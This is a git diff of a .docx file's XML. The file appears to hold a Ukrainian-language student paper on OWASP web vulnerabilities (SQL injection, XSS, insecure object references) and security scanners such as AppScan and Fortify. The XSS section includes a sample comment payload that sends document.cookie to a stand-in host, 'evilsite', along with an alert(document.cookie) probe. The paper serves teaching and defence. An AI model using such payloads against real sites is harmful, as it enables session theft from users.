+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> користувачем і скомпрометувати його обліковий запис. Якщо додаток недостатньо добре захищає ідентифікатори сеансів (наприклад, відображає ідентифікатори всередині URL-адреси замість використання cookie-файлів), то зловмиснику дуже просто отримати ідентифікатор сеансу, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обдуривши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> користувача.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Навіть якщо Web-додаток зберігає ідентифікатори сеансів в cookie-файлах, зловмисник все одно може отримати потрібну інформацію з локальних файлів користувача, хитрістю змусивши його виконати замаскований сценарій. За допомогою простого сценарію можна витягти ідентифікатор сеансу, що зберігається в cookie-файлі на комп'ютері користувача; наприклад, можна отримати ідентифікатор сеансу за допомогою наступного сценарію, введеного в поле пошуку уразливого Web-додатки: &lt;script&gt; alert (document.cookie) &lt;/ script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1416" w:firstLine="708"/>
         <w:textAlignment w:val="baseline"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
@@ -24831,6 +25620,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
       </w:r>
       <w:r>
@@ -24947,18 +25737,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
+        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25600,6 +26379,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
       </w:r>
       <w:r>
@@ -25611,8 +26391,6 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29518,6 +30296,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -29898,6 +30677,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -30385,7 +31165,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{78AC16E4-7FEA-41D9-9AC3-12F5C364D1F4}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{740880D6-EE86-4E82-AC72-5D9FA9414C9D}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -25096,29 +25096,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Ін’єкція</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> коду</w:t>
+        <w:t>1. Ін’єкція коду</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25144,161 +25122,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Ін’єкція коду завжди бул</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займа</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>є</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> верхню строчку списку OWASP. Існує безліч різновидів цієї у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>разливості, але до сих пір самою сумнозвісною</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> з них є </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>н’єкція</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL-коду. Вона </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатк</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> не відфільтровує </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>дані</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
+        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25526,8 +25350,1019 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>3. Міжсайтовий скриптинг</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Приклад XSS-атаки</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Якщо Web-додаток дозволяє користувачам заходити на Web-сторінку і розміщувати відгуки, то поле для введення коментаря схильне</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> до</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS-атак. Нижче показаний приклад коментаря (This is a great product &lt;script&gt; document.write ( '&lt;img scr = http: //evilsite/'+document.cookie&gt;'); &lt;/ script &gt;&gt;), що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>4. Небезпечні прямі посилання на об'єкти</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Вразливість</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, обумовлена ​​наявністю небезпечних прямих посилань на об'єкти, може привести до того, що авторизований користувач Web-додатки може отримати неавторизований доступ до привілейованих функцій і даних. Якщо в коді програми неграмотно або неправильно реалізовані методи роботи з інформаційними об'єктами (наприклад, з файлами, каталогами або ключами баз даних), то користувачі, що не володіють необхідними привілеями, можуть обійти засоби захисту, реалізовані в додатку. Використовуючи цю вразливість, користувачі можуть змінювати значення параметрів таким чином, щоб безпосередньо звертатися до об'єктів, доступ до яких їм заборонено</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
